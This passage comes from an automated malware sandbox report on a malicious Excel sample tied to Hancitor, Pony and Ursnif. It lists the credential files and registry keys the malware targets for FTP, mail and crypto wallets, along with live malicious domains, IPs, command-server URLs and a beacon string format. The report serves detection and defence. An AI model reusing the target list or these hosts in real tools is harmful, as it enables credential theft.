          • C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
          • C:\ProgramData\FlashFXP\3\Sites.dat
          • C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
          • C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat
          • C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
          • C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\
          • HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
          • HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
          • HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar
          • C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
          • C:\ProgramData\FileZilla\filezilla.xml
          • C:\ProgramData\GlobalSCAPE\CuteFTP\
          • C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\
          • C:\ProgramData\GlobalSCAPE\CuteFTP Lite\
          • C:\Program Files (x86)\CuteFTP\
          • C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
          • C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat
          • C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat
          • C:\Users\user\wcx_ftp.ini
          • C:\ProgramData\GHISLER\wcx_ftp.ini
          • C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
          • C:\ProgramData\FileZilla\recentservers.xml
          • C:\Users\user\AppData\Local\CuteFTP\sm.dat
          • C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
          • C:\Users\user\AppData\Local\FileZilla\recentservers.xml
          • C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\
          • C:\ProgramData\FlashFXP\4\Sites.dat
          • C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\
          • C:\ProgramData\FlashFXP\4\Quick.dat
          • HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
          • C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
          • C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
          • C:\Program Files (x86)\CuteFTP\sm.dat
          • HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
          • C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini
          • C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\
          • C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
          • C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
          • C:\ProgramData\FlashFXP\3\History.dat
          • C:\ProgramData\CuteFTP\
          • C:\ProgramData\FlashFXP\4\History.dat
          • C:\Windows\wcx_ftp.ini
          • C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
          • C:\ProgramData\SmartFTP\
          Tries to steal Crypto Currency Wallets
          Source: C:\Windows\SysWOW64\svchost.exe; File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\file__0.localstorage
          Tries to steal Mail credentials (via file access)
          Source: C:\Windows\SysWOW64\svchost.exe; Key opened (each key listed once; the report repeats the same opens several times):
          • HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          • HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
          • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to steal Mail credentials (via file registry)
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword (6_2_1000A34F)
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword (6_2_1000A34F)

          Remote Access Functionality:

          Yara detected Ursnif
          Source: Yara match; File source: 0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000003.549333620.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000003.549457976.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000003.549162557.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000003.549367546.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000003.549299177.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000003.549421669.0000000003868000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: BN6D10.tmp PID: 1940, type: MEMORY
          Yara detected Hancitor
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 4912, type: MEMORY
          Source: Yara match; File source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
          Yara detected Pony
          Source: Yara match; File source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY

          Mitre Att&ck Matrix

          The matrix is listed here by tactic (one line per column of the original table). Superscript digits are the report's per-technique counters exactly as they appear in the matrix; techniques without a counter are the unmatched template entries.

          Initial Access: Valid Accounts¹, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service, Supply Chain Compromise, Trusted Relationship, Hardware Additions
          Execution: Windows Management Instrumentation², Scripting¹, Execution through API¹², Exploitation for Client Execution⁴, Graphical User Interface¹, Graphical User Interface, Scripting, Third-party Software, Rundll32, PowerShell, Execution through API
          Persistence: Valid Accounts¹, Application Shimming¹, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts, DLL Search Order Hijacking, Change Default File Association, File System Permissions Weakness
          Privilege Escalation: Valid Accounts¹, Access Token Manipulation¹¹, Process Injection⁴¹², Application Shimming¹, File System Permissions Weakness, New Service, Scheduled Task, Process Injection, Service Registry Permissions Weakness, Exploitation for Privilege Escalation, Valid Accounts
          Defense Evasion: Software Packing²¹, Disabling Security Tools¹¹, Deobfuscate/Decode Files or Information¹, Scripting¹, Obfuscated Files or Information², Masquerading¹¹, Valid Accounts¹, Virtualization/Sandbox Evasion¹³, Access Token Manipulation¹¹, Process Injection⁴¹², DLL Side-Loading¹
          Credential Access: Credential Dumping², Input Capture¹, Credentials in Registry², Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History, Input Prompt, Keychain, Private Keys
          Discovery: System Time Discovery¹, Account Discovery¹, Security Software Discovery¹⁴¹, File and Directory Discovery³, System Information Discovery⁴⁵, Network Share Discovery¹, Virtualization/Sandbox Evasion¹³, Process Discovery³, System Owner/User Discovery¹, Remote System Discovery¹, Security Software Discovery
          Lateral Movement: Remote File Copy¹⁴, Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol, Windows Admin Shares, Taint Shared Content, Replication Through Removable Media
          Collection: Data from Local System³, Email Collection¹, Input Capture¹, Input Capture, Data Staged, Screen Capture, Email Collection, Clipboard Data, Automated Collection, Audio Capture, Video Capture
          Exfiltration: Data Encrypted¹, Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Physical Medium, Commonly Used Port, Standard Application Layer Protocol
          Command and Control: Remote File Copy¹⁴, Standard Cryptographic Protocol²², Standard Non-Application Layer Protocol⁴, Standard Application Layer Protocol¹⁵, Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol, Multilayer Encryption, Connection Proxy, Communication Through Removable Media
          Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
          Impact: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Disk Structure Wipe

          Behavior Graph

          Behavior Graph ID: 1179994, Sample: tr_0.xls, Startdate: 14/07/2020, Architecture: WINDOWS, Score: 100

          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 13 other signatures. Sample-level DNS: low.explik.at

          Process tree as recovered from the graph text (node numbers are the graph's; numbers in square brackets are the graph's created-registry-value / created-file counters, reproduced as shown):

          • 10 EXCEL.EXE [70 67], started
            • Network: mac-rail.com (5.101.51.247; ports 49704, 80; SELECTELRU; Russian Federation)
            • Dropped: C:\Users\user\Documents\dDdoiBj.ocx (PE32); C:\Users\user\AppData\Local\...\434[1].dll (PE32)
            • Signatures: Document exploit detected (creates forbidden files); Document exploit detected (process start blacklist hit); Document exploit detected (UrlDownloadToFile)
            • 19 regsvr32.exe, started
              • Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
              • 27 svchost.exe [2 13], started
                • Network: overnightfile.com (91.218.231.226; ports 49706, 49708, 49711; IHCRUInternet-HostingLtdMoscowRussiaRU; Russian Federation); accesoeducativo.com (185.206.163.136; ports 443, 49707, 49709; AS-HOSTINGERLT; Germany); 3 other IPs or domains
                • Dropped: C:\Users\user\AppData\Local\Temp\BN6D10.tmp (PE32)
                • Signatures: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file registry); 3 other signatures
                • 34 BN6D10.tmp, started
                  • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 5 other signatures
                • 37 svchost.exe [12], started
                  • Network: overnightfile.com
                  • Signatures: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); 3 other signatures
                • 40 cmd.exe [1], started
                  • 42 conhost.exe, started
              • 32 WerFault.exe [25 10], started
          • 15 iexplore.exe, started
            • 22 iexplore.exe, started
              • Network: low.explik.at (8.208.80.226; ports 49714, 49715, 49717; CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC; Singapore); gaw.explik.at
          • 17 iexplore.exe, started
            • 25 iexplore.exe, started
              • Network: gaw.explik.at

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          tr_0.xls | 20% | Virustotal | -
          tr_0.xls | 17% | ReversingLabs | Document-Word.Trojan.Kryptik

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | 100% | Avira | TR/AD.ZDlder.phzid
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp | 100% | Avira | TR/Crypt.Agent.sxpge
          C:\Users\user\Documents\dDdoiBj.ocx | 100% | Avira | TR/AD.ZDlder.phzid
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | 100% | Joe Sandbox ML | -
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp | 100% | Joe Sandbox ML | -
          C:\Users\user\Documents\dDdoiBj.ocx | 100% | Joe Sandbox ML | -
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | 48% | Virustotal | -
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | 16% | Metadefender | -
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | 32% | ReversingLabs | Win32.Trojan.Ejgrzty
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp | 42% | Virustotal | -
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp | 14% | Metadefender | -
          C:\Users\user\AppData\Local\Temp\BN6D10.tmp | 55% | ReversingLabs | Win32.Trojan.Kryptik
          C:\Users\user\Documents\dDdoiBj.ocx | 48% | Virustotal | -
          C:\Users\user\Documents\dDdoiBj.ocx | 16% | Metadefender | -
          C:\Users\user\Documents\dDdoiBj.ocx | 32% | ReversingLabs | Win32.Trojan.Ejgrzty

          Unpacked PE Files

          Source | Detection | Scanner | Label
          13.0.BN6D10.tmp.400000.0.unpack | 100% | Avira | TR/Crypt.Agent.sxpge
          13.2.BN6D10.tmp.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          6.3.svchost.exe.5c00000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          6.3.svchost.exe.5800000.0.unpack | 100% | Avira | TR/Kryptik.avp.8
          13.3.BN6D10.tmp.d80000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          6.2.svchost.exe.2440000.0.unpack | 100% | Avira | TR/Dropper.Gen
          13.2.BN6D10.tmp.ef0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
          6.3.svchost.exe.5c00000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          12.2.svchost.exe.bc00000.0.unpack | 100% | Avira | HEUR/AGEN.1122461
          6.2.svchost.exe.10000000.3.unpack | 100% | Avira | TR/Kryptik.avp.8
          6.3.svchost.exe.5100000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
          6.3.svchost.exe.5100000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

          Source | Detection | Scanner
          mac-rail.com | 6% | Virustotal
          accesoeducativo.com | 1% | Virustotal
          overnightfile.com | 4% | Virustotal
          gaw.explik.at | 6% | Virustotal
          low.explik.at | 9% | Virustotal

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          mac-rail.com | 5.101.51.247 | true | true | - | unknown
          elb097307-934924932.us-east-1.elb.amazonaws.com | 54.225.191.113 | true | false | - | high
          accesoeducativo.com | 185.206.163.136 | true | true | - | unknown
          overnightfile.com | 91.218.231.226 | true | true | - | unknown
          gaw.explik.at | 8.208.80.226 | true | true | - | unknown
          low.explik.at | 8.208.80.226 | true | true | - | unknown
          api.ipify.org | unknown | unknown | false | - | high

              Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://api.ipify.org/ | false | - | high
          http://overnightfile.com/d2/about.php | true | 5%, Virustotal; Avira URL Cloud: safe | unknown
          http://overnightfile.com/4/forum.php | true | 1%, Virustotal; Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

                                            • Avira URL Cloud: safe
                                            unknown
                                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                              high
                                              https://api.microsoftstream.com/api/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                  high
                                                  https://cr.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                    high
                                                    https://portal.office.com/account/?ref=ClientMeControlD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                      high
                                                      http://www.reddit.com/msapplication.xml5.19.drfalse
                                                        high
                                                        https://ecs.office.com/config/v2/OfficeD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                          high
                                                          https://graph.ppe.windows.netD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                            high
                                                            https://res.getmicrosoftkey.com/api/redemptioneventsD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                            • 0%, Virustotal, Browse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://powerlift-frontdesk.acompli.netD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                            • 0%, Virustotal, Browse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://tasks.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                              high
                                                              http://cps.root-x1.letsencrypt.org0svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officeci.azurewebsites.net/api/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                high
                                                                https://accesoeducativo.com/wp-content/themes/futurio/2https://accesoeducativo.com/wp-content/themessvchost.exe, 00000006.00000002.708057638.0000000002859000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://store.office.cn/addinstemplateD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                • 0%, Virustotal, Browse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://cps.letsencrypt.org0svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://wus2-000.pagecontentsync.D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                  high
                                                                  https://globaldisco.crm.dynamics.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                    high
                                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                      high
                                                                      https://store.officeppe.com/addinstemplateD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://dev0-api.acompli.net/autodetectD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.odwebp.svc.msD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      low
                                                                      https://sherdornyc.com/wp-content/themes/futurio/1svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://api.powerbi.com/v1.0/myorg/groupsD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                        high
                                                                        https://web.microsoftstream.com/video/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                          high
                                                                          https://sherdornyc.com/wp-content/themes/futurio/3svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://sherdornyc.com/wp-content/themes/futurio/2svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://graph.windows.netD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                            high
                                                                            https://dataservice.o365filtering.com/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officesetup.getmicrosoftkey.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://analysis.windows.net/powerbi/apiD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                              high
                                                                              https://prod-global-autodetect.acompli.net/autodetectD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                              • 0%, Virustotal, Browse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://outlook.office365.com/autodiscover/autodiscover.jsonD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                high
                                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                  high
                                                                                  http://cert.int-x3.letsencrypt.org/07svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                      high
                                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                        high
                                                                                        http://overnightfile.com/4/forum.phpdsvchost.exe, 00000006.00000002.708220563.0000000002894000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.youtube.com/msapplication.xml8.19.drfalse
                                                                                          high
                                                                                          http://overnightfile.com/4/forum.phpectsvchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://autosuggest.search.aol.com/autocomplete/get?output=json&it=&q=svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://api.ipify.org0.0.0.0GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID=%I64u&BUILD=%regsvr32.exe, 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, svchost.exe, 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            low
                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                              high
                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                high
                                                                                                http://weather.service.msn.com/data.aspxD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                  high
                                                                                                  https://apis.live.net/v5.0/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  low
                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                    high
                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                      high
                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                        high
                                                                                                        https://accesoeducativo.com/x/1.16.1svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://https://ftp://operawand.dat_Softwaresvchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        low
                                                                                                        https://management.azure.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                          high
                                                                                                          https://incidents.diagnostics.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                            high
                                                                                                            https://clients.config.office.net/user/v1.0/iosD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                              high
                                                                                                              ftp://http://https://ftp.fireFTPsites.datMozillasvchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              http://www.ibsensoftware.com/svchost.exe, svchost.exe, 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmpfalse
                                                                                                              • 3%, Virustotal, Browse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://insertmedia.bing.office.net/odc/insertmediaD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                high
                                                                                                                https://accesoeducativo.com/svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://o365auditrealtimeingestion.manage.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                    high
                                                                                                                    https://incidents.diagnosticssdf.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                      high
                                                                                                                      https://search.aol.com/favicon.icohttps://search.aol.com/aol/search?q=svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://asgsmsproxyapi.azurewebsites.net/D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        low
                                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                          high
                                                                                                                          http://www.amazon.com/msapplication.xml.19.drfalse
                                                                                                                            high
                                                                                                                            https://accesoeducativo.com/obalSCAPEsvchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://app.powerbi.com/taskpane.htmlD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                              high
                                                                                                                              https://accesoeducativo.com/wp-content/themes/futurio/2svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://entitlement.diagnostics.office.comD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                                high
                                                                                                                                https://accesoeducativo.com/wp-content/themes/futurio/1svchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmpfalse
                                                                                                                                • 3%, Virustotal, Browse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.twitter.com/msapplication.xml6.19.drfalse
                                                                                                                                    high
                                                                                                                                    https://accesoeducativo.com/wp-content/themes/futurio/3svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown

Contacted IPs

                                                                                                                                    Public

IP | Country | ASN | ASN Name | Malicious
8.208.80.226 | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
54.225.191.113 | United States | 14618 | AMAZON-AESUS | false
5.101.51.247 | Russian Federation | 49505 | SELECTELRU | true
91.218.231.226 | Russian Federation | 203226 | IHCRUInternet-HostingLtdMoscowRussiaRU | true
185.206.163.136 | Germany | 47583 | AS-HOSTINGERLT | true

General Information

Joe Sandbox Version: 29.0.0 Ocean Jasper
Analysis ID: 1179994
Start date: 14.07.2020
Start time: 11:19:04
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 8m 58s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: tr_0.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
